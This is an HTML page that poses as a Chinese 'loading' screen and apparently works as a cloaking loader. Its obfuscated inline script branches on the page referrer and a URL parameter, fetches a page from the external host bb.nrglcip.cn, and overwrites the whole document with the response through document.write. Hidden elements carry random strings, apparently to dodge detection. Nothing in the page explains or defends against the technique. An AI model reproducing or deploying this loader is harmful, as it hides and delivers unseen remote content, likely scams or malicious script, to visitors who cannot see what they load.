<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PJYWtwH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PJYWtwH .qUK5Wf {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PJYWtwH .content {
            line-height: 50px;
            text-align: center
        }

        .PJYWtwH .img {
            width: 100%
        }

        .PJYWtwH .BsrOibaA {
            text-align: center
        }

        .PJYWtwH .BsrOibaA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PJYWtwH .BsrOibaA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PJYWtwH .BsrOibaA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PJYWtwH .BsrOibaA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PJYWtwH .BsrOibaA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PJYWtwH .BsrOibaA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PJYWtwH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Ov1DKAcVt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var x5LJLrf = Ov1DKAcVt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ x5LJLrf +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ x5LJLrf +".html?a=share";
		}
		
        HdKYL7IFTO=url+"#"+new Date().getTime();
        HdKYL7IFTO && function() {
            $.get(HdKYL7IFTO, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >sf2e8t4Sb7EJMGaJ5RNIj6oNCkfRhqLqssLUKb75QR</h1>
<div style='display:none'>dYgCMNS31h7fpudNlBdcU9weTFZfPAlO7PSieXf1qkWSCi</div><div class="PJYWtwH">
    <div class="qUK5Wf">
        <div class="BsrOibaA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>RB7fKOdh2wwffCJeI5kfR2m0tzAlu</a>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<b style='display:none' >OPfJholzNC5C5Nu9TwxCjSWWNfbuur7KtfQL8R67IN9</b></body>
</html>